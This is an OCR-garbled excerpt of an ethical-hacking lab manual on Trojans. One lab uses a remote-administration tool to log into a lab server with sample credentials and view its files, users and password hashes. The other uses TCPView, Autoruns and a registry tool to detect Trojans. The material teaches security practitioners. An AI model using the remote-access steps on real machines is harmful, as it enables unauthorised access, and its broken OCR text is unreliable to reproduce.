A backdoor Trojan is a very dangerous infection that compromises the integrity o f a computer, its data, and the personal inform ation o f the users. Remote attackers use backdoors as a means o f accessing and taking control o f a computer that bypasses security mechanisms. Trojans and backdoors are types o f bad-wares; their main purpose is to send and receive data and especially commands through a port to another system. This port can be even a well- known port such as 80 or an out o f the norm ports like 7777. Trojans are most o f the time defaced and shown as legitimate and harmless applications to encourage the user to execute them.

You are a security adm inistrator o f your company, and your job responsibilities include protecting the network from Trojans and backdoors, Trojan attacks, theft o f valuable data from the network, and identity theft.



The objectives o f tins lab include:

• G ain access to a remote computer

• Acquire sensitive inform ation o f the remote computer


To cany out tins, you need:

1. A te lier Web Rem ote Commander located at D:\CEH-Tools\CEHv8 Module 06 Trojans and Backdoors\Trojans Types\Rem ote A ccess Trojans (RAT)\Atelier Web Rem ote Commander

I C O N K E Y

/ V a lu a b lein fo rm a tio n

y 5 T e s t y o u rk n o w led g e

TTTTT W eb ex erc ise

m W o rk b o o k re v ie w

JT Tools demonstrated in this lab are availab le in D:\CEH- Tools\CEHv8 Module 06 Trojans and Backdoors





■ Windows Server 2003 running 111 Virtual Machine

■ I f you decide to download the la test version, then screenshots shown 111 the lab might differ


■ Adm inistrative privileges to m il tools


Time: 20 Minutes


A Trojan is a program that contains m alicious or harmful code inside apparently harmless programming or data 111 such a way that it can get control and cause damage, such as ruining the file allocation table on a hard drive.

Note: The versions o f the created client or host and appearance may differ from what it is 111 die lab, but die actual process o f connecting to die server and accessing die processes is same as shown 111 diis lab.

L a b T a s k s

1. Install and launch A te lie r Web Rem ote Commander (AW RC) 111W indows Server 2012.

2. To launch A te lier Web Rem ote Commander (AW RC), launch the S ta rt menu by hovering the mouse cursor on the lower-left corner o f the desktop.

u

§

€

■3 Windows Server 2012MVMom Swvw M l? DMwCMidM•

su.t Evaluator cgpt. Eud M0C. rw *13PM 1

FIGURE 6.1: Windows Server 2012 Start-Desktop

3. C lick AW Rem ote Commander Professional 111 the S ta rt menu apps.

a* T AS K 1

Atelier Web Remote

Commander




Administrator AStart

CtnvUcr Tnfc

*£

Tools

4

AWfieoioteConnwn..

&

FIGURE 6.2: Windows Server 2012 Start Menu Apps

4. The main w indow o f AWRC w ill appear as shown 111 the follow ing screenshot.

AWRC PRO 9.3.9סיFile Tools Help

Desktop Syclnfo Netwarklnfo FJ# Sy*t*fn Uc*rs *nr. Grocpc Chat

Progress Report

y, Connect Disconnect

d f 0 Request ajthonrabor @ dear on iscomect

kBytesIn: C k8psln: 0 Connection Duraton

ט Tliis toll is used to gain access to all the information of die Remote system

FIGURE 6.3: Atelier Web Remote Commander main window

5. Input the IP address and Usernam e I Passw ord o f the remote computer.

6. 111 tins lab we have used W indows Server 2008 (10.0.0.13):■ User name: Adm inistrator■ Password: qwerty@123

Note: The IP addresses and credentials m ight differ 111 your labs

7. C lick Connect to access the machine remotely.




FIGURE 6.4: Providing remote computer details

8. The follow ing screenshots show that you w ill be accessing the W indows Server 2008 remotely.

10.0.0.13 :AWRC PRO 9.3.9SFile Tools Help

Desktop Syslnfo Networidnfb Fie System Use's anc Groups Chat

*29 Monitors *

Internet Explo־er

windows update

j Notepad

< r ~& Fastest * T F V

Progress Report

#16:28:24 Initializing, please wait... #16:28:25 Connected to 10 .0 .0.13

Remote Host| administrator

W C onnect ^ D isconnect

c f □ Request ajthoniabor @ Clear on iscomect

Cumeiliui 1 Duiatun: !Minute, 42 Seconds.k B ^IiL 0.87k5yle*I11; 201.94

Tools demonstrated in this lab are availab le in D:\CEH- Tools\CEHv8 Module 06 Trojans and Backdoors

FIGURE 6.5: Remote computer Accessed

9. The Commander is connected to the Remote System. C lick theSys Info tab to view complete details o f the V irtual Machine.




FIGURE 6.6: Information of the remote computer10. Select Networklnfo Path where you can view network inform ation.

10.0.0.13: AWRC PRO 9.3.9SFile Jools Help

Desktop Syslnfo | NetworiJnfo | Ffe System Use's anc Grocps Chat

P/Transport Protocols\Ports Safeties\PasswoidPermissions M ax Uses Current Uses PathRemark

not val■

not va li

not vaN

A D M IN S Spe . Remote Admin net applica... unlimitedC $ S pe .. Default share not a p p lic a .. unlimited

IPCS S pe .. Remote IPC net applica unlimited

Progress Report

#16.28 .24 Initializing, please wait #16:28:25 Connected to 10 0 .0 .13

Remote Host

^ Connect A / Disconnect

a f D Request ajthonrabor @ dear on iscomect

Connection Duraton: 5 Minutes, 32 Seconds.kSpsIn: 0.00Ifiytesln: 250.93

& Tools dem onstrated in this lab are availab le in D:\CEH- Tools\CEHv8 Module 06 Trojans and Backdoors

FIGURE 6.7: Information of the remote computer

11. Select the F ile System tab. Select c:\ from the drop-down list and click Get.

12. Tins tab lists the complete files o l the C:\ drive o f W indows Server 2008.




10.0.0.13: AWRC PRO 9.3.9file Iools Help

Desktop Syslnfo NetworicJnfb I Fie System I Use's and Groups Chat

contents of 'c:'______CIJ SRecycle Bin

C l Boot

C3 Documents and Settings

C□ PerfLogs D Program Files (x86)□ Program Files

C l ProgramDataD System Volume Inform...□ Users□ Windows

17 ,177,767.936 bytes

6.505.771 .008 bytes

Fixed Capacity:

Free space:

File System : N TFS Type

Serial Number: 6C 27-C D 39 Labei:

Progress Report

#16.28 .24 Initializing, please wait... #16:28:25 Connected to 10 .0 .0.13

| administrator

Password^ Connect Disconnect

c f ] Request ajthoriratxx־ @ Oear on iscomect

ConnectonDuraton: 6 Minutes, 18 Seconds.kBytesIn: 251.64


13. Select Users and Groups, which w ill display the complete user details.

־' ם: "10.0.0.13 :AWRC PRO 9.3.9File Jools Help

Desktop Syslnfo NetworkJnfo Ffe System Use's anc Groups I Chat

j Users ^ Groups \ Password Ha^ies

U ser In fo rm atio n for A d m in is tra to rUser A ccount. AdministratorPassword A ge 7 days 21 hours 21 minutes 33 seconds Privilege Level: AdministratorComment Built-in account for administering the computer/domain Flags: Logon script executed. Normal Account.Full Name:W orkstations can log from: no restrictionsLast Logon: 9 /20 /2012 3:58:24 AMLast Logoff UnknownAccount expires Never expiresUser ID (RID) 500Pnmary Global Group (RID): 513SID S 1 5 21 1858180243 3007315151 1600596200 500Domain W IN -E G B H ISG 14L0No SubAuthorties 5

Progress Report#16:28:24 Initializing, please wait... #16:28:25 Connected to 10 .0 .0.13

User Name [ administrator

Password

Remote Host10.0.0.13

W C onnect ^ D isconnect

n f D Request ajthon:at>or @ Oear on iscomect

Cumeuiimi3u1atu< 1: e Minutes, 26Seconds.kByle* 111: 256.00





10.0.0.13: AW RC PRO 9.3.9rsfile Iools Help

Desktop Syslnfo NetworWnfo We System Use's and Groups Chat

Passwoid Ha«hes\ | Groups ~ |y

Nam es SID CommentAdministrators S -1 -5-32-544 (Typo A lias/D o Administrators have complete and unrestricted

Backup O p e ra to r S -1 -5-32-551 (Type A lias/D o Backup Operators can override security restrictCertificate Service DC S-1-6-32-674 (Type A lias/D o . Members of this group are allowed to connect t«Cryptographic Ooerat S -1-5-32-569 (Type A lias/D o Members are authorized to perform cryptograph

Distributed C O M U se־׳s S-1-5-32-562 (Type A lias/D o . Members are allowed to launch. actKate and usEvent Log Readers 5 -1 -5 -32-573 (Type A lias /D o ... Members of this group can read event logs from

Guests S-1-5-32-546 (Type A lias/D o Guests have the sam e access as members o ft

<1 III ______I

Groups:

S - 1 -5-21-1858180243-3007315... Ordinary users

GlobalGroups:

Progress Report

#16.28 .24 Initializing, please wait... #16:28:25 Connected to 10 .0 .0.13

| administrator

Password^ Connect Disconnect

c f ] Request ajthonrabor @ dear on iscomect

Connection Ouraton: ?Minutes, 34Seconds.kBytesIn: 257.54



14. Tins tool w ill display all the details o f the remote system.

15. Analyze the results o f the remote computer.

L a b A n a ly s is

Analyze and document die results related to die lab exercise. G ive your opinion on your target’s security posture and exposure dirough public and tree information.






Rem otely accessing W indows Server 2008

R esu lt: System inform ation o f remote W indowsServer 2008

Atelier Web Remote

Network Inform ation Path remote W indows Server 2008

Commander view ing complete files ot c:\ o f remote W indowsServer 2008User and Groups details o f remote W indows Server2008Password hashes

Q u e s t io n s1. Evaluate die ports that A W RC uses to perform operations.

2. Determine whether it is possible to launch A W RC from the command line and make a connection. I f ves, dien illustrate how it can be done.


□ Yes

Platfo rm Supported

0 C lassroom

0 N o




D e t e c t i n g T r o j a n s

A T ro ja n is a p ro g ram th a t co n ta in s M a lic io u s o r h a rm fu l code in s id e a p p a re n tly

h arm le ss p ro g ram m in g o r d a ta in such a )ra y th a t can g e t c o n tro l a n d cause dam age,

su ch a s m in in g th e f ile a llo c a tio n ta b le on a h a rd d riv e .


M ost individuals are confused about the possible ways to remove a Trojan virus from a specific system. One must realize that the W orld W ide W eb is one o f the tools that transmits inform ation as w ell as malicious and harm ful viruses. A backdoor Trojan can be extremely harm ful if not dealt w ith appropriately. The main function o f tins type o f virus is to create a backdoor 111 order to access a specific system. W ith a backdoor Trojan attack, a concerned user is unaware about the possible effects until sensitive and im portant inform ation is found missing from a system. W ith a backdoor Trojan attack, a hacker can also perform other types ot m alicious attacks as well. The other name for backdoor Trojans is remote access Trojans. The main reason that backdoor Trojans are so dangerous is that they hold the ability to access a particular machine rem otely (source: http://www.com bofix.org).

You are a security7 adm inistrator o f your company, and your job responsibilities include protecting the network from Trojans and backdoors, Trojan attacks, theft o f valuable data from the network, and identity theft.


The objective o f this lab is to help students learn to detect Trojan and backdoor attacks.


• Analyze using Port ]Monitor

• Analyze using Process M onitor

• Analyze using Registry M onitor

• Analyze using Startup Program M onitor

• Create M D5 hash tiles for W indows directory files

I CON KEY

1/ V a lu a b le in fo rm a tio n

T e s t y o u r '*.׳י■_________k n o w led g e______

^ W e b ex erc ise

d W o rk b o o k re v ie w

& Tools dem onstrated in this lab are availab le in D:\CEH- Tools\CEHv8 Module 06 Trojans and Backdoors


C E H Lab M anual 9

http://www.combofix.org



To carry out this, you need:

■ Tcpview , located at D:\CEH-Tools\CEHv8 Module 06 Trojans and Backdoors\Port M onitoring Tools\TCPView

■ Autoruns, located at D:\CEH-Tools\CEHv8 Module 06 Trojans and Backdoors\Process M onitoring Tools\Autoruns

■ PrcV iew , located at C:\CEH-Tools\CEHv7 Module 06 Trojans and Backdoors\Process M onitor Tool\Prc V iew

■ Jv1 6 power tool, located at D:\CEH-Tools\CEHv8 Module 06 Trojans and Backdoors\Registry M onitoring Tools\jv16 Pow er Tools 2012

Fsum י FrontEnd. located at D:\CEH-Tools\CEHv8 Module 06 Trojans and Backdoors\Files and Folder In tegrity Checker\Fsum Frontend


■ Windows Server 2003 mnning h i Virtual Machine

■ I f you decide to download the la test version, then screenshots shown 111 the lab might differ


■ Adm inistrative privileges to m il tools


Time: 20 Minutes


A Trojan is a program diat contains m alicious or harmful code inside apparently harmless programming or data 111 such a way that it can get control and cause damage, such as ruining the file allocation table on a hard drive.

Note: The versions o f the created client or host and appearance may differ from what it is 111 the lab, but the actual process o f connecting to the server and accessing the processes is same as shown 111 tins lab.

L a b T a s k s

1. Go to Windows Server 2012 Virtual Machine.

2. Install Tcpview from the location D:\CEH-Tools\CEHv8 Module 06 Trojans and Backdoors\Port Monitoring Tools\TCPView.

3. The TC P View main wmdow appears, w ith details such as Process, Process ID , Protocol, Local address. Local Port, Remote Address, and Remote Port.

& Disabling and Deleting EntriesIf you don't want an entry to active die nest time you boot or login you can eidier disable or delete it. To disable an entry uncheck it. Autoruns will store die startup information in a backup location so diat it can reactivate die entry when you recheck it. For items stored in startup folders Autoruns creates a subfolder named Autoruns disabled. Check a disabled item to re-enable it

Tcpview


C E H Lab M anual 0


TCPView - Sysinternals: www.sysinternals.com

File Options Process View HelpH a h |

|| Process > PID Protocol Local Address Local PottC l dns. exe 1572 I CP win-2n9stosgien domain w flT7 dns. exe 1572 I CP WIN-2N9ST0SGI.. domain V׳/lT7 dns. exe 1572 tCP WIN-2N9STOSGL 49157 WlT7 dns. exe 1572 UDP win-2n9sto$gien domaini- dns. exe 1572 UDP WIN-2N9ST0SGL domainI"7 dns. exe 1572 UDP WIN-2N9ST0SGI.. 49152i7־ dns. exe 1572 UDP WIN-2N9STOSGL 49153i"7 dns. exe 1572 UDP WIN-2N9ST0SGL 49154IF dns. exe 1572 UDP WIN-2N9STOSGL 49155» dns. exe 1572 UDP WIN-2N9STOSGL 49156dns. exe י 1 1572 UDP WIN-2N9ST0SGI.. 49157» 1 dns. exe 1572 UDP WIN-2N9STOSGL 49158T7 dns. exe 1572 UDP WIN-2N9ST0SGL 49159r dns. exe 1572 UDP WIN-2N9STOSGI.. 49160» dns. exe 1572 UDP WIN-2N9STOSGL 49161T dns. exe 1572 UDP WIN-2N9STOSGI.. 49162dns. exe י 1572 UDP WIN-2N9ST0SGI.. 49163r dns. exe 1572 UDP WIN-2N9ST0SGI.. 49164dns. exe י 1572 UDP WIN-2N9ST0SGI.. 49165י ׳ dns. exe 1572 UDP WIN-2N9ST0SGI.. 49166

dns. exe ־1 1572 UDP WIN-2N9ST0SGI.. 491671 dns. exe 1572 UDP WIN-2N9ST0SGL 49168T dns. exe 1572 UDP WIN-2N9STOSGL 49169dns. exe ו• 1572 UDP WIN-2N9STOSGI.. 49170• dns. exe 1572 UDP WIN-2N9STOSGL 49171 V 1־1 III >

___________ ___________ ___________ ___________ ___________ UFIGURE 8.1: Tcpview Main window

tool perform port monitoring.

- TCPView - Sysinternals: www.sysinternals.com I ~ I □ f X1 File Options Process View Help

y a @ !־ Process ' PID Protocol Local Address |Local Port 1 R ^111 svchost.exe 385S ICP WIN-2N9ST0SGI.. 5504 Wl(0 svchostexe 892 tCP WIN-2N9STOSGI.. 49153 WlH svchost.exe 960 ICP WIN-2N9STOSGL 49154 Wl11 svchost.exe 1552 ICP WIN-2N9STOSGL 49159 WlITI svchost.exe 2184 ICP WIN-2N9ST0SGI.. 49161 WlS3 svchost.exe 3440 TCP WIN-2N9STOSGI.. 49163 WlS3 svchost.exe 4312 TCP WIN-2N9ST0SGI.. 49168 WlS3 svchost.exe 4272 TCP WIN-2N9STOSGI.. 49169 WlS3 svchost.exe 1808 TCP WIN-2N9ST0SGL 49187 Wlי'1 svchost.exe 1552 UDP win-2n9stosgien bootpsS3 svchost.exe 1552 UDP win-2n9stosgien bootpcsvchost.exe י '1 9S0 UDP WIN-2N9ST0SGI... isakmpS3 svchost.exe 1552 UDP win-2n9stosgien 253513 svchost.exe 3092 UDP WIN-2N9STOSGL 3391E3 svchost.exe 960 UDP WIN-2N9ST0SGL teredoS3 svchost.exe 960 UDP WIN-2N9ST0SGI... ipsec-msftS3 svchostexe 1064 UDP WIN-2N9STOSGL llmnr *S3 svchost.exe 960 UDP win-2n9stosgien 53441 *T7 System 4 TCP win-2n9stosgien netbios-ssn Wlי 1 System 4 TCP win-2n9stosgien microsoft-ds wir• 1 System 4 TCP win-2n9stosgien microsoft-ds wir• ' System 4 TCP WIN-2N9STOSGI... http Wlי7 י System 4 TCP WIN-2N9STOSGI... https WlT 7 System 4 TCP WIN-2N9STOSGI... microsoft-ds Wl• 1 System 4 TCP WIN-2N9STOSGI... 5985 Wl v

III n >

FIGURE 8.2: Tcpview Main window

5. Now it is analyzing die SM TP and odier ports.


03 Should delete items that you do not wish to ever execute. Do so by choosing Delete in the Entry menu. Only die currendy selected item will be deleted

Cl If you are running Autoruns without administrative privileges on Windows Vista and attempt to change die state of a global entry, you'll be denied access


http://www.sysinternals.com



TCPView - Sysinternals: www.sysinternals.comדFile Options Process View Help

y a“rotocol Local Address Local Port Remote Address Remote Pott StatCP WIN-2N9ST0SGL 3388 WIN-2N9ST0SGL 0 LISTCP WIN-2N9ST0SGL 5504 WIN-2N9ST0SGL 0 LISTCP WIN-2N9ST0SGL 49153 WIN-2N9ST0SGL 0 LISTCP WIN-2N9ST0SGL 49154 WIN-2N9ST0SGI.. 0 LISTCP WIN-2N9ST0SGL 49159 WIN-2N9ST0SGI.. 0 LISTCP WIN-2N9ST0SGL 49161 WIN-2N9ST0SGI.. 0 LISTCP WIN-2N9ST0SGL 49183 WIN-2N9ST0SGI.. 0 LISTCP WIN-2N9ST0SGL 49168 WIN-2N9ST0SGI.. 0 LISTCP WIN-2N9ST0SGL 49169 WIN-2N9ST0SGI.. 0 LISTCP WIN-2N9ST0SGL 49187 WIN-2N9ST0SGI.. 0 LISTDP win-2n9stosgien bootps x *DP win-2n9stosgien bootpc * ייDP WIN-2N9ST0SGL isakmp ייDP win-2n9stosgien 2535 * ייDP WIN-2N9ST0SGL 3391 * ייDP WIN-2N9ST0SGL teredo יי ייDP WIN-2N9STOSGL ipsecmsft * ייDP WIN-2N9ST0SGL llmnr יי ייDP win-2n9stosgien 53441 יי ייCP win-2n9stosgien netbios-ssn WIN-2N9ST0SGL 0 LISTCP wir>-2n9stosgien microsoft-ds win-egbhisgl 410 49158 EST,CP wirv2n9$tosgien microsoft-ds windows8 49481 EST,CP WIN-2N9ST0SGL http WIN-2N9ST0SGI.. 0 LISTCP WIN-2N9ST0SGL https WIN-2N9ST0SGI.. 0 LISTCP WIN-2N9ST0SGL microsoft-ds WIN-2N9ST0SGI.. 0 LIST< III . ך

ח־

FIGURE 8.3: Tcpview analyzing ports

You can also kill die process by double-clicking diat respective process, and then clicking die End Process button.

Properties for dns.exe: 1572

| Domain Name System (DNS) Server ך־ Microsoft Corporation Version: G.02.8400.0000

Path:C:\Windows\System32\dns.exe

End Process

OK

FIGURE 8.4: Killing Processes

Go to Windows Server 2012 Virtual Machine.

Double-click Autoruns.exe, which is located at D:\CEH-Tools\CEHv8 Module 06 Trojans and Backdoors\Process Monitoring Tools\Autoruns.

It lists all processes. DLLs, and services.

& Autoruns will display a dialog with a button that enables you to re-launch Autoruns with administrative rights. You can also use the -e command-line option to launch initially launch Autoruns with administrative rights

Cl There are several ways to get more information about an autorun location or entry. To view a location or entry in Explorer or Regedit chose Jump To in the Entry menu or double-click on the entry or location's line in the display

1m T A S K 2

Autoruns





Ci You can view Explorer's file properties dialog for an entry's image file by choosing Properties in die Entry menu. You can also have Autoruns automatically execute an Internet search in your browser by selecting Search Online in the Entry menu.

& Simply run Autoruns 1 °- following is the detailed list on the Logon tab.and it shows you die currendy configured autostart applications in the locations that most direcdy execute applications.Perform a new scan that reflects changes to options by refreshing die display

CQ Internet Explorer This entry shows Browser Helper Objects (BHO's), Internet Explorer toolbars and extensions

11. The following are die Explorer list details.

O Autoruns [WIN-2N9STOSGIEN\Administrator] - Sysinternals: www.sysinter...LI File Entry Options User Help

dis) ^ 1 X ^H Codacs | P Boot Execute | ^ Image Hjacks | [ j) Applnit | |j») KnownDLLs | ^ Wnlogon i f : Winsock Providers Print Monitors LSA Providers £ Network Providers | Sidebar Gadgets!3 Everything | Logon Explorer 4$ Internet Explorer '1 Scheduled Tasks | Services ^ Drivers

Autorun Entry Description Publisher Image Path0 [ i j] HotKeysCmds hkcmd Module Intel Corporation c:\windom\system32\hkc...0 lafxTrav igfxTray Module Intel Corporation c:\windows\system32\igfxtr0 l i l Persistence persistence Module Intel Corporation c:\windows\system32\igfxp .

S E3 Adobe ARM Adobe Reader and Acrobat. . Adobe Systems Incorporated c:\program files (x86)\comm..0 0 Adobe Reader... Adobe Acrobat SpeedLaun... Adobe Systems Incorporated c:\prograrn files (x86)\adob..0 EPS0N_UD_S. EPSON USB Display VI.40 SEIKO EPSON CORPORA... c:\program files (x86)\epso.0 9 googletalk Google Tak Google c:\program files (x86)Vgoogl.0 fH SurvlavaUpdat JavalTM) Update Scheduler Sun Microsystems, Inc. c:\program files |x86)Vcomm

t S C:\ProgramDataVM1c10soft\WrKlows\Start MenuVPrograms\Startup

Windows Entries HiddenReady

FIGURE 8.9: Automns Logon list

O Autoruns [WIN-2N9STOSGIEN\Administrator] ־ Sysinternals: www.sysinter.J ~File Entry Options User Help

V KnownDLLs | A Wriogon,־ | Applnit ,־$► | J Codecs | 3 Boot Execute | 3 Image Hijacks]1ft Winsock Providers ] ^ Print Monitors | LSA Providers | £ Network Providers | 9 ־ . Sidebar GadgetsO Everything Logon < Explorer | & Internet Explorer | J Scheduled Tasks | Services | Drivers

Autorun Entry Description Publisher Image Path■}jf HKLM\SOFTWARE\Microsoft\Window$ N T \CurrentVers10n\Winl0g0nl'AppS etup

0 g ] UsrLogon cmd c:\windows\systern32\usrlo...HKLM\S 0 FT WAR E \M icrosof t\Windows\CurrentVersion\R un

0 [ i j] HotKeysCmds hkcmd Module I ntel Corporation c: \windo ws\sy stem32\hkc...0 £3 IgfxT ray igfxT ray Module Intel Corporation c:\windows\system32\igfxtr. ..0 fil Persistence persistence Module Intel Corporation c:\windows\system32\igfxp...

$ H KLM \S 0 FTWAR E \W0w6432N ode\M icrosoft\Wmdows\CurrentVersion\R un E Adobe ARM Adobe Reader and Acrobat... Adobe Systems Incorporated c:\program files (x86)Vcomm..0 0 Adobe Reader Adobe Acrobat SpeedLaun.. Adobe Systems Incorporated c:\program files (x86)\adob0 EPS0N_UD_S.. EPSON USB Display VI 40 SEIKO EPSON CORPORA.. c:\program files (x86)\epso...r־a r \־ . . ■______ ^ . T ■_______________ ^ ._____________________ ._______ ™ , **** .

Ready Windows Entries Hidden.

FIGURE 8.5: Autoruns Main Window

Eth ical Hacking and Countermeasures Copyright © by EC-CouncilA ll Rights Reserved. Reproduction is Stricdy Prohibited.


http://www.sysinter.J


O Autoruns [WIN-2N9STOSGIEN\Administrator] ־ Sysinternals: www.sysinter...LFile Entry Options User Help

| Codecs | 3 Boot Execute | 3 Image H^acks | '■> Applnit | ' KnownDLLs ] A WnbgonWinsock Providers | 1* Print Monitors | LSA Providers | Network Providers | Sidebar Gadgets

Z ? Everything | ^ Logon[ ,j Explorer £ Internet Explorer | J Scheduled Tasks | Services | Drivers

Autorun Entry Description Publisher Image PathH KLM \S 0 FT WAR E \Classes\Protocois\F*er

0 ^ tex t/xm l Microsoft Office XML MIME... Microsoft Corporation c:\programfiles\commonfi..• iff H KLM \S oftware\Classes\x\S heC xVContextM enuH andlers

0 ^ SnagltMainSh... Snagit Shell Extension DLL TechSmith Corporation c:\program files (x86)\techs..0 fo־ WinRAR WinRAR shel extension Alexander Roshal c:\programfiles\winrar\rare.

H KLM \S 0ftware\W0w6432N0de\Classes\x\S helE x\ContextM enuH andlers 0 SnagltMainSh. Snagit Shell Extension DLL TechS mith Corporation c:\program files (x86)\techs..0 *V WinRAR32 WinRAR shel extension Alexander Roshal c:\programfiles\winrar\rare.

H KLM \S oftware\Classes\D »ectory\S heME xSContextM enuH andlers 0 SnagltMainSh Snagit Shell Extension DLL TechS mith Corporation c:\program files (x8S)\techs.

Windows Entries Hidden.Ready

& Services All Windows services configured to start automatically when the system boots.

FIGURE 8.10: Autonins Explorer list

12. T lie following are die Services list details.

O Autoruns [WIN-2N9STOSGIEN\Administrator] - Sysinternals: www.sysinter...LFile Entry Options User Help

*J & & B X *H Codecs | ־־I Boot Execute ] 3 Image hijacks | [^ Applnit | KnownDLLs | ^ Wintogon fc?; Winsock Providers | & Print Monitors LSA Providers f Network Providers 1 Sidebar GadoetsO Everything | ^ Logon | Explow [ j Internet Explorer Scheduled Tasks | Services Drivers

Image Path

c: \windows\syswow64\ma c:\program filesNwindows id.. c:\program files (x86)\epso... c:\program files (x86|\m02i ... c:\program files (x86)\comm c:\program file$\common fi c:\program filesVupdate ser

Publisher

Adobe Systems Incorporated Microsoft Corporation SEIKO EPSON CORPORA.. Mozilla Foundation Microsoft Corporation Microsoft Corporation Microsoft Corporation

Autorun Entry Descriptiong HKLM\System\CurrentControlSet\Services

0 [ 1 י AdobeFlashPta T his service keeps you Ad... 0 [■1 c2wts Service to convert claims b ..0 0 EMPJJDSA EPSON USB Display VI 40 0 F I M02illaMainten... The Mozia Maintenance S. . 0 F I ose Savesinstalationfilesused ..0 F I osoosvc Office Software Protection...0 H WSusCertServer This service manages the c...


(33 Drivers This displays all kernel-mode drivers registered on tlie system except those that are disabled

FIGURE 8.11: Autoruns Services list

13. T lie following are die Drivers list details.





V KnownDLLs | A Wriogon,־ | Applnit ,־$ [ H Codecs | !3 Boot Execute | 3 Image H^acksNetwork Providers | Sidebar Gadgets £־ | *ft Winsock Providers [ & Print Monroes | $ LSA Providers

O Everything | Logon | . < Explorer | ^ Internet Explorer | J Scheduled Tasks | Services DriversImage Path

c: \windows\system32\drrve. c: \windows\sy stem32\drrve. c: \ windo ws\sy stem32\drive. c: \ window$\system32\drrve. c: \ windo ws\system32\drive. c: \ windo ws\system32\drive. c: \ windo w$\system32\drive. c: \ windowsSsy stem32\drrve. c: \window$\system32\drive.

Publisher

| LSI 3ware SCSI Storpoct Driver}SI Adaptec Windows SAS/SA... Adaptecjnc.Adaptec Windows SATA St.. Adaptec, Inc.Adaptec StorPort Ultra320... Adaptecjnc.AHD 1.2 Device Driver Advanced Micro Devices AM D T echnology AH Cl Co... AM D T echnologies I nc.S tor age Filter D river AdvancedMicroD e vicesAdaptec RAID Storpoct Driver PMC-Sierra, Inc.Adaptec SAS RAID W S03... PMC-SierraJnc.

Autorun Entry DescriptionHKLM\System\CurrentControlSet\Services

3ware (S ) adp94xx

^ adpahci ^ adpu320 4 amdsata,־

^ amdsbs ^ amdxata

& arcsas

Windows Entries Hidden.Ready

£9 Scheduled Tasks Task scheduler tasks configured to start at boot or logon

FIGURE 8.12: Autoruns Drivers list.

14. The following is die KnownDLLs list 111 Antonins.


d j) & B X *I?• Winsock Providers | ^ Print Monitors | ^ LSA Providers | f Network Providers | 9• Sidebar Gadgetsכ Everythin ^ LogonO Ever/hing Logon | Explorer ] & Internet Explorer ] J Scheduled Tasks 1 Services [ DriversQ Codecs Q Boot Execute | f"^ Image Hijacks | [j| Applnit \ KnownDLLs j Winlogon

Autorun Entry Description Publisher Image PathijT H KLM \System\CurrentControlS et\Controf\S ession Manager\KnownDII$

0 13 _W0w64 File not found: C:\Wndows...0 1 ר W o w 64 cp u File not found: C:\Wndows.0 11 Wow64win File not found: C:\Wndows. ..


FIGURE 8.13: Autoruas Known DLL’s list.

15. Install and launch jv16 PowerTools 111 W indows Server 2012 (host machine).

16. jv l6 Power Tool is located at D:\CEH-Tools\CEHv8 Module 06 Trojans and Backdoors\Registry Monitoring Tools\jv16 Power Tools 2012.

17. To launch jv16 PowerTools, select die Start menu by hovering die mouse cursor on die lower-left corner ot die desktop.

T A S K 4

Jv16 Power Tool




u

״ UnilbRntaי

€(tarnaPPkmtTi...

■3 Windows Server 2012Wirdowt Server 2012 Rocate Cancxfatr Caucrnt.

fc valuator copy. Eud *40... . * JL J L . ל 1

FIGURE 7.1: Windows Server 2012 Start-Desktop

18. C lick jv16 Pow erTools 2012 111 S ta rt menu apps.

03 Winlogon Notifications Shows DLLs that register for Winlogon notification of logon events

FIGURE 7.2: Windows Server 2012 Start Menu Apps

19. Click the Clean and fix my com puter icon.

C] Winsock Providers Shows registered Winsock protocols, including Winsock service providers. Malware often installs itself as a Winsock service provider because there are few tools that can remove them. Autoruns can uninstall them, but cannot disable them

Start Administrator A




P jv l 6 PowerTools 2012

1 E*e Language lo o k Help

O K r Trad LrnMDon n Effect - 60 days left Live Support: Handbook not Onlne avadaWe

Speed up my computer

Fully remove software and

leftovers

Immunize my Verify my downloadscomputer are safe to a n

Control which programs start automabcaly

Trial Reminder

H o m e

Registry Tools

ד ו File Tools

i System Tools

Privacy Tools

— Backups

Acton H story

LUJ Settings

■ 92<*>

Registry Health

9SV0PC Healthjv l6 PowerTools (2 .1 .0 .11 73 ) runnng on Datacenter Edition (x64) with 7.9 GB o f RAM

[1 0 :2 9 :4 5 T ־ ip ]: Your system has now been analyzed. The health score o f your computer ts 95 out o f 100 and the health score o f y o ir W ndows regstry 6 9 2 out o f 100. I f you scored under 100 you can improve! the ratings by usrtg the Oean and F a M y Computer tool.

FIGURE 8.20: jvl6 Home page.

20. The Clean and fix my com puter dialog box appears. Click the Settings tab and then click die Start button.

jv l 6 PowerTools 2012 [W8-X&4] - Clean and fix my computer *

□ # L i 10Settings Additional Additional Search Ignore words safety options words

SettingsEmphasize safety over both scan speed and the number of found errors.

AEmphasize the number o f found errors and speed over safety and accuracy.

Selected setting: Normal system scan policy: all Windows-related data is skipped for additionalsafety. Only old temp files are listed.

CancelH




FIGURE 8.21: jvl6 Clean and fix my computer dialogue.

21. It w ill analyze your system for tiles; this w ill take a few minutes.

ט Printer Monitor Drivers Displays DLLs that load into the print spooling service. Malware has used this support to autostart itself

22. Computer items w ill be listed after die complete analysis.

L J You can save die results of a scan with File->Save and load a saved scan widi File->Load. These commands work with native Autoruns file formats, but you can use File->Export to save a text-only version of the scan results. You can also automate the generation of native Autoruns export files with command line options

23. Selected item details are as follows.

LJ Sidebar Displays Windows sidebar gadgets

iv16 PowerTools 2012 rW8-x641 - Clean and fix mv comDuter! r x ־ !ם

File Select Tools HelpItemSeverityDescriptionTags

Item / Seventy Descrpbon Tags........................

!3 Registry Errors 7

I ^ Invalid file or directory reference!־ 7

I ] c ) Registry junk 266

ח ♦J Obsolete software entry 4

|~1 Useless empty key 146

ח ♦J Useless file extension 116

^ +J Start menu and desktop items 23

I - II Delete dose

Selected: 0, highlighted: 0, total: 296

FIGURE 8.24: jvl6 Clean and fix my computer Items details.

1-1 jv16 PowerTools 2012 [W8-x64] - Clean and fix my computer! ־ I ם P xFile Select Tools Help

[Analyzing your computer. This can יג

take a few minutes. Please wait...

Abort

FIGURE 8.22: jvl6 Clean and fix my computer Analyzing.

(3S LSA Providers Shows registers Local Security Authority (LSA) authentication, notification and security packages




jv16 PowerTools 2012 [W8-x64] - Clean and fix my computerFile Select Tools HelpItemSeventyDescriptionTags

Item / Seventy Descry ton Tags

13 Registry Errors 7A

ח 13 Invalid tile 01 directory reference 7

כ HKCR Unstall :3% FJe or directory X : =1 HKCRUnstal Fie or directory 'C:

